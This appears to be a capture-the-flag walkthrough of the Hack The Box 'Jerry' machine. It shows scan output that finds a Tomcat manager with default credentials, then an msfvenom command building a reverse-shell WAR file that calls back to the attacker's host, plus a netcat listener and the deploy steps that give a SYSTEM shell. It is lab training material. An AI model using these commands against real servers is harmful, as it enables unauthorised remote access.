This is a walkthrough of the Jerry box from Hack The Box, done without using Metasploit.
1. Reconnaissance
I learned about this awesome all-in-one nmap script called nmapAutomator. I will use it to run all my scans:
./nmapAutomator.sh 10.10.10.95 All
- All = runs all the scans consecutively
- Note: This scan took about 30 minutes to run for me. But you will get some info right away, so you can use that while the rest of the scan is completing. In the case of this scan, the most helpful bit (the default creds) didn’t show up until about 25 min into the scan. Just something to keep in mind as you are trying to allocate your time accordingly.
The completed scan gives us this info:
Running all scans on 10.10.10.95
Host is likely running Windows
———————Starting Nmap Quick Scan———————
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:44 PDT
Nmap scan report for 10.10.10.95
Host is up (0.091s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to –defeat-rst-ratelimit
PORT STATE SERVICE
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds
———————Starting Nmap Basic Scan———————
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:44 PDT
Nmap scan report for 10.10.10.95
Host is up (0.091s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds
———————-Starting Nmap UDP Scan———————-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:45 PDT
Nmap scan report for 10.10.10.95
Host is up.
All 1000 scanned ports on 10.10.10.95 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.56 seconds
———————Starting Nmap Full Scan———————-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:48 PDT
Initiating Parallel DNS resolution of 1 host. at 21:48
Completed Parallel DNS resolution of 1 host. at 21:48, 0.05s elapsed
Initiating SYN Stealth Scan at 21:48
Scanning 10.10.10.95 [65535 ports]
Discovered open port 8080/tcp on 10.10.10.95
SYN Stealth Scan Timing: About 11.72% done; ETC: 21:52 (0:03:54 remaining)
SYN Stealth Scan Timing: About 23.15% done; ETC: 21:52 (0:03:23 remaining)
SYN Stealth Scan Timing: About 33.46% done; ETC: 21:52 (0:03:01 remaining)
SYN Stealth Scan Timing: About 43.95% done; ETC: 21:53 (0:02:38 remaining)
SYN Stealth Scan Timing: About 58.57% done; ETC: 21:52 (0:01:49 remaining)
SYN Stealth Scan Timing: About 69.48% done; ETC: 21:52 (0:01:21 remaining)
SYN Stealth Scan Timing: About 81.43% done; ETC: 21:52 (0:00:49 remaining)
Completed SYN Stealth Scan at 21:52, 262.67s elapsed (65535 total ports)
Nmap scan report for 10.10.10.95
Host is up (0.093s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
8080/tcp open http-proxy
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.78 seconds
Raw packets sent: 131260 (5.775MB) | Rcvd: 192 (8.448KB)
No new ports
———————Starting Nmap Vulns Scan———————
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:52 PDT
Nmap scan report for 10.10.10.95
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.76 seconds
Running Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:52 PDT
Nmap scan report for 10.10.10.95
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
|_http-server-header: Apache-Coyote/1.1
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server’s resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 248.72 seconds
———————Recon Recommendations———————-
Web Servers Recon:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.95:8080 -o recon/gobuster_10.10.10.95_8080.txt
nikto -host 10.10.10.95:8080 | tee recon/nikto_10.10.10.95_8080.txt
Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>
Running Default in (1) s:
———————Running Recon Commands———————-
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.95:8080
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/24 21:57:35 Starting gobuster
===============================================================
http://10.10.10.95:8080/aux (Status: 200) [Size: 0]
http://10.10.10.95:8080/com1 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com3 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com2 (Status: 200) [Size: 0]
http://10.10.10.95:8080/con (Status: 200) [Size: 0]
http://10.10.10.95:8080/docs (Status: 302) [Size: 0]
http://10.10.10.95:8080/examples (Status: 302) [Size: 0]
http://10.10.10.95:8080/favicon.ico (Status: 200) [Size: 21630]
http://10.10.10.95:8080/host-manager (Status: 302) [Size: 0]
http://10.10.10.95:8080/lpt1 (Status: 200) [Size: 0]
http://10.10.10.95:8080/lpt2 (Status: 200) [Size: 0]
http://10.10.10.95:8080/manager (Status: 302) [Size: 0]
http://10.10.10.95:8080/nul (Status: 200) [Size: 0]
===============================================================
2020/09/24 21:59:09 Finished
===============================================================
Finished gobuster scan
=========================
Starting nikto scan
– Nikto v2.1.6
—————————————————————————
+ Target IP: 10.10.10.95
+ Target Hostname: 10.10.10.95
+ Target Port: 8080
+ Start Time: 2020-09-24 21:59:10 (GMT-7)
—————————————————————————
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for ‘Tomcat Manager Application’ at /manager/html (ID ‘tomcat’, PW ‘s3cret’). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7967 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2020-09-24 22:13:47 (GMT-7) (877 seconds)
—————————————————————————
+ 1 host(s) tested
Finished nikto scan
=========================
———————Finished all Nmap scans———————
Completed in 29 minute(s) and 6 second(s)
A summary of the results:
- One port open (8080 running Apache Tomcat/Coyote JSP engine 1.1)
- Apache Tomcat is running in the /manager/html page
- The nikto scan found that the manager page takes default credentials tomcat/s3cret
- Apache Tomcat allows you to run code. Because of this we can deploy a war file that generates a reverse shell
2. Exploitation
Open a browser window and go to the /manager/html page and log in with the default credentials we found
Now use msfvenom to generate a war file payload that will create a reverse shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war
And then upload that file to the application manager and hit deploy:
Then open a new terminal window and open up a listener on the port you used when you generated your payload (I used 4444):
nc -nlvp 4444
Now click on the war file in the application manager, which will execute it. After you click it, you can go back to your listener and if all goes well, you should see a reverse shell generated! Run a whoami and we can see that we are authority\system (root):
Grab your flags!
